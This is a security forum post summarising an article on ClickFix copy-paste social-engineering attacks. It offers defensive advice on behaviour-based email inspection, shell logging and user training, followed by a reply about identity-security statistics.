Notifications
Clear all
Topic starter
27/06/2026 1:52 pm
TL;DR: Microsoft’s Digital Defense Report 2025 says ClickFix is one of its most observed initial access methods, using benign-looking copy-paste commands instead of links or attachments, which makes reputation-based email and endpoint controls far less effective. The lesson is that modern social engineering succeeds on context and behavior, so detection has to move earlier than user execution.
NHIMG editorial — based on content published by Abnormal AI: ClickFix and the shift toward behaviour-based email attacks
Questions worth separating out
Q: How should security teams stop ClickFix-style attacks before users execute commands?
A: Security teams should move detection into the email layer and look for requests that are behaviourally unusual, not only technically malicious.
Q: Why do ClickFix attacks bypass many traditional email and endpoint controls?
A: They bypass many controls because they do not depend on a malicious link or attachment.
Q: What do teams get wrong about training users against social engineering?
A: Teams often focus training on identifying bad links, fake domains, or obvious phishing language.
Practitioner guidance
- Deploy behavioural email inspection Inspect sender-recipient history, request plausibility, and message context before delivery to users.
- Harden script and shell visibility Enable script logging and monitor paste-to-execute patterns in PowerShell and similar shells so investigations can reconstruct what happened after user interaction.
- Tune user education around request patterns Train users to question any message that asks them to run a command, even if it appears to come from IT or a trusted brand.
What's in the full article
Abnormal AI's full article covers the operational detail this post intentionally leaves for the source:
- Specific examples of how ClickFix messages are framed to look like routine IT support
- The email-layer behavioural checks Abnormal uses to evaluate sender legitimacy and request context
- The Microsoft guidance referenced in the article, including logging and browser hardening details
- The operational difference between blocking a suspicious request and detecting it after user interaction
👉 Read Abnormal AI’s analysis of ClickFix and behaviour-based email attacks →
ClickFix and behavior-based email attacks: are your controls keeping up?
Explore further
27/06/2026 3:21 pm
Behaviour-based email attacks expose a trust problem, not just a detection problem. ClickFix succeeds because the request looks routine enough to pass the human plausibility test before it ever becomes a malware problem. That means the real failure is not only poor filtering, but a control model that assumes malicious content must be visibly malicious.
A few things that frame the scale:
- 85% of organisations lack full visibility into third-party vendors connected via OAuth apps, according to The State of Non-Human Identity Security.
- Only 1.5 out of 10 organisations are highly confident in their ability to secure NHIs, compared to nearly 1 in 4 for securing human identities.
A question worth separating out:
Q: How can organisations measure whether behavioural email security is working?
A: Measure whether suspicious requests are blocked before user interaction, whether analysts are seeing fewer downstream endpoint alerts, and whether investigations shorten when a message does get through. Effective controls shift detection upstream, so the first signal appears in the email flow rather than on the endpoint.
👉 Read our full editorial: ClickFix shows why behavior-based email defense now matters most
